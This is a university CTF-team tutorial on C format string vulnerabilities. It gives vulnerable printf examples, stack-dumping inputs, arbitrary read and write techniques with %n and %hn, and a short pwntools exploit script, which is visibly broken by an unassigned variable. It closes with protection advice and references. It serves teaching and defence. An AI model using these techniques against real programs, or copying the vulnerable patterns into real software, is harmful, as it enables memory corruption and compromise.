Format String Bug Introduction
Summary
This document gives an introduction into format string bugs. The Format String Bug occurs when the programmer passes user controlled buffer to the Format Function. Then user input data is evaluated as a command by the application. An exploit can read from the stack and perform arbitrary write on the stack and therefore change the program behavior. This can lead to program crashes (segmentation faults) and security compromise such as reveal of secrets in memory (information disclosure) or execute arbitrary commands.
Requirements
Binaries are tested on platform: Debian 4.9.210-1 (2020-01-20)
git clone https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ccst cd ccst/format_string
All here discussed code examples can be found in the example folder. They are compiled in 32 bit architecture x86 using gcc version 6.3.0 (posix).
gcc example -m32 -o example
Exploits for x64 architecture may differ
Description of Format String Vulnerability
The Bold textFormat function in ANSI C conversion function such as `printf`, which converts a variable into a human-readable string representation. The Format String is the argument of the Format Function, it contains an ASCII string with text and Format Parameter, such as:
printf (“Guess solution: %d\n”, 42);
Here 42 is interpreted as a decimal number by the Format Function.
The Format Parameter/Specifier %d,%s,%p,%u,..
defines the type of conversion function.
Format Parameter/Specifier Table
Parameters | Output | Passed as |
---|---|---|
%p | External representation of a pointer to void | Reference |
%d | Decimal | Value |
%c | Character | Value |
%u | Unsigned decimal | Value |
%x | Hexadecimal | Value |
%s | String | Reference |
%n | Writes the number of characters into a pointer | Reference |
In vulnerable code the user input is directly passed to the function printf(userinput)
instead of a Format String including Format Parameter.
Vulnerable Format Functions Table
Format function | Description |
---|---|
fprint | Writes the printf to a file |
printf | Output a formatted string |
sprintf | Prints into a string |
snprintf | Prints into a string checking the length |
vfprintf | Prints the a va_arg structure to a file |
vprintf | Prints the va_arg structure to stdout |
vsprintf | Prints the va_arg to a string |
vsnprintf | Prints the va_arg to a string checking the length |
History
The Format String Bug is publicly known since at least September 1999[1], it has obtained major attention after public release of the exploit code anainst wu-ftpd 2.6.0 in June 2000[2].
Read From the Stack
Example - Read from the stack
Shows safe and vulnerable usage of Format Function
#include <stdio.h> void main(int argc, char **argv) { // This line is safe printf("%s\n", argv[1]); // This line is vulnerable printf(argv[1]); }
Execute with different arguments:
./example "%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p" ./example "%08x.%08x.%08x.%08x.%08x%08x.%08x.%08x.%08x.%08x" ./example "%s"
The Format Function interprets the passed command line arguments as formatted string with 15 pointer arguments. As a further specification is missing it will print the next 15 pointer from the stack, which means we are able to dump the stack.
What happens exactly?
- Stack with correctly coded Format String
printf(“this is a %s, with a number %d, and address %08x”,a,b,&c);
The stack grows to the lower addresses and is used in a LIFO manner, the arguments are pushed in reverse order on the stack. The Format Function will pop a, b, c variables and convert them into the string which is sent to stdout.(Source of image: [3])
- Stack with missing variables
printf(userinput)
with an input string “this is a %s, with a number %d, and address %08x”
evaluates to
printf(“this is a %s, with a number %d, and address %08x”);
The variables a,b,&c are missing on the stack.(Source of image: [3])
The Format Function pops the next values from the stack even when they have not been declared.
If the source code is available a Format String vulnerability can be recognized by checking all Format Functions, if the string including Format Specifier are correctly provided. In case of a binary test by simply inserting Format Specifiers "%x %x %s"
as input.
Read by Direct Stack Parameter Access
File example2.c
# include <stdio.h> # include <string.h> void vuln() { printf("What's your name? "); char name[200]; gets(name); printf("Nice to meet you, "); printf(strcat(name, "!\n")); }
void main(int argc, char **argv) { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); vuln(); }
We can read arbitrary from the stack by "%<some number>$x"
, so to read the first argument on the stack we use %1$08x
for the second %2$08x
...
To get an idea where we are reading, we can use a method of inserting
"AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x" ./example2 What's your name? AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x Nice to meet you, AAAA.5655f000.00000001.5655d64d.ffd4fbb8.f77595f0.f75bf00b.41414141.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78!
then we are able to determine the number of the input buffer on the stack where 41414141
is found. So the input buffer name is the 6th argument on the stack, which can be accessed by AAAA.%6$08x
Caution - data on the stack is represented in little Endian on Unix machines. Test this by inserting
ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x ./example2 What's your name? ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x Nice to meet you, ABCD.f18281a0.0000004f.ffffffaf.85571440.00000012.44434241.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838!
The Format string with our input ABCD...
can be found at the stack beginning with the 6th argument 44434241
in little Endian and can verified by ABCD.%6$08x
.
Arbitrary Read
We like to read data in memory from an known address. The examples before showed the content of the Format String on the stack is controlled by us.
Then we need a Format Parameter which uses an address from the stack (per reference) and displays the memory from there %s
.
Now we insert the address which we like to read and define that the 6th item on the stack should be read as string at the pointer address passed by reference with %s
.
address = 0x08480110 address (encoded as 32 bit le string): "\x10\x01\x48\x08" printf ("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");
(With this information you should be able to solve CH0_easyprintf)
Write the Stack
Write with %n
The %n
Format Parameter writes the number of bytes already printed into a variable. The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack.
File: example3
int n_chars = 0; printf("Hello, World%n is ", &n_chars); printf("%d bytes long.\n",n_chars);
In the first printf call with %n Format Parameter in example3 the number of 12 bytes of Hello, World
are written into the variable `n_chars`
.
%n
can be used to write into an specified address
\xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n"
The next printf calls show how the value of n_chars can be controlled by inserting a number of bytes for alignment.
n_chars = 0; printf("%10u%n ", 1, &n_chars); //n_chars=10 n_chars = 0; printf("%150u%n ", 2, &n_chars); //n_chars=150
But addresses in memory are at least 4 bytes long and we do not like to overwrite these areas on the stack. Therefore techniques to write just a byte are used several times.
Let us have a closer look what is happening, because writing just one byte may have some side effects. An unsigned integer in memory is stored in 4 bytes in Little Endian encoding, therefore a number like 0x0000014c
is \x4c\x01\x00\x00
in memory.
File: example4
unsigned char canary[5]; unsigned char foo[4]; memset (foo, "\x00", sizeof (foo)); /* 0 * before */ strcpy (canary, "AAAA"); /* 1 */ printf ("%16u%n", 7350, (int *) &foo[0]); //foo[0]=0x10 /* 2 */ printf ("%32u%n", 7350, (int *) &foo[1]); //foo[1]=0x20 /* 3 */ printf ("%64u%n", 7350, (int *) &foo[2]); //foo[3]=0x40 /* 4 */ printf ("%128u%n", 7350, (int *) &foo[3]); //foo[3]=0x80 /* 5 * after */ printf ("%02x%02x%02x%02x\n", foo[0], foo[1],foo[2], foo[3]); printf ("canary: %02x%02x%02x%02x\n", canary[0],canary[1], canary[2], canary[3]);
In step 0 foo is initialized with 4 times \x00
bytes and in the next variable on the stack a canary is stored with AAAA
presented by \x41\x41\x41\x41
. After the execution of the 4 steps bytewise write operation foo contains 10204080 as expected, but 3 bytes of the canary got overwritten \x00\x00\x00\x41
= 00000041. The next Figure illustrates this behavior of the write procedures.(Image source:[4])
Multiple byte writes at once can also be performed, when the written bytes are ordered. File: example4
strcpy (canary, "AAAA"); printf ("%16u%n%16u%n%32u%n%64u%n",1, (int *) &foo[0], 1, (int *) &foo[1],1, (int *) &foo[2], 1, (int *) &foo[3]); printf ("%02x%02x%02x%02x\n", foo[0], foo[1],foo[2], foo[3]); printf ("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]);
Output again foo: 10204080 and canary: 00000041.
Write Short %hn
Instead of writing each byte we can use a technique to write short integers using %hn
format specifier. The advantage of using %hn
is that it does not destroy data near the targeted address. Therefore this is the preferred method.
Again we like to write 10204080 into foo.
First value of alignment: 0x2040=8208
Second value of alignment: 0x8040-0x2040=32832-8208=24624
Source: example5
printf ("%.8208u%hn%.24624u%hn",1, (short int *) &foo[0], 1, (short int *) &foo[2]);
Output: foo: 10204080 canary: 41414141 Writing short values enables an exploitation of the Format String Bug without overwriting nearby memory locations.
To overwrite an address of 4 bytes we just need two writing steps, be aware of the correct parameter passing.
Write Short Example: Given a binary with a Format String vulnerability vuln. We like to overwrite a variable test
on the stack with the known address of test_addr=0xffeeecac
and set it to test=0x1337babe
. The input buffer used in the printf function is the 6th element on the stack.
A Python script for exploitation string p32(addr)+p32(addr+2)+'%'+str(first)+'x%6$hn'+%'+ str(second)'+x%7$hn
looks like
from pwn import * p = process('./vuln') test_addr=0xffeeecac payload= payload+=p32(test_addr) payload+=p32(test_addr+2) first=0xbabe-len(payload) payload+='%'+str(first)+'x%6$hn' second+=0x1337-first-8 payload+='%'+str(second)+'x%7$hn' p.sendline(payload) p.interactive()
(Now you should be able to solve the challenge CH1_root_me2 and CH2_printfun)
Usage
- Reading arbitrary locations (leak addresses or canaries)
- Writing arbitrary locations
- Executing arbitrary code (Overwrite Return, .GOT addresses)
Protection
- Programmer should use safe versions
Never pass user input directly to Format Function without format specifier.[5]
prinftf("%s",userinputbuffer) snprintf(buf, sizeof buf, "%s", userinputbuffer);
- FormatGuard: Automatic Protection From printf Format String Vulnerabilities [6]
Courses
- Campus Cyber Security Team (05-15-2020)
Sources
- https://owasp.org/www-community/attacks/Format_string_attack
- https://www.exploit-db.com/docs/english/28476-linux-format-string-exploitation.pdf
- http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20Format%20Bugs%20-%20Exploiting%20format%20string.pdf
- http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html
Interesting CTF writeups
- Use format string bug to leak canary and system addresses https://naivenom.tistory.com/19
- https://github.com/yuvaly0/CTFs/blob/master/2020_tamu/B64DECODER_DONE/B64DECODER.md
References
- ↑ Tymm Twillman,Exploit for proftpd 1.2.0pre6, BugTraq, 20-09-1999, https://seclists.org/bugtraq/1999/Sep/328 [accessed 05-21-2020].
- ↑ tf8, WuFTPD: Providing *remote* root since at least 1994, BugTraq, 22-06-2000, https://seclists.org/bugtraq/2000/Jun/297 [accessed 05-21-2020].
- ↑ Jump up to: 3.0 3.1 Saif El Sherei, Format String Exploitation-Tutorial, https://www.exploit-db.com/docs/english/28476-linux-format-string-exploitation.pdf[accessed 05-21-2020].
- ↑ scut / team teso, Exploiting Format String Vulnerabilities, version 1.2,09-01-b2001, http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20Format%20Bugs%20-%20Exploiting%20format%20string.pdf[accessed 05-21-2020]
- ↑ Michael Howard, David LeBlanc and John Viega, 19 deadly sins of software security programming flaws and how to fix them, Chapter 2, 2005 http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20Format%20String%20Problems.pdf, [accessed 05-22-2020].
- ↑ Crispin Cowan , Matt Barringer , Steve Beattie , Greg Kroah-hartman , Mike Frantzen and Jamie Lokier, FormatGuard: Automatic Protection From printf Format String Vulnerabilities, Usenix, 2001 https://www.usenix.org/legacy/events/sec01/full_papers/cowanbarringer/cowanbarringer.pdf [accessed 05-21-2020].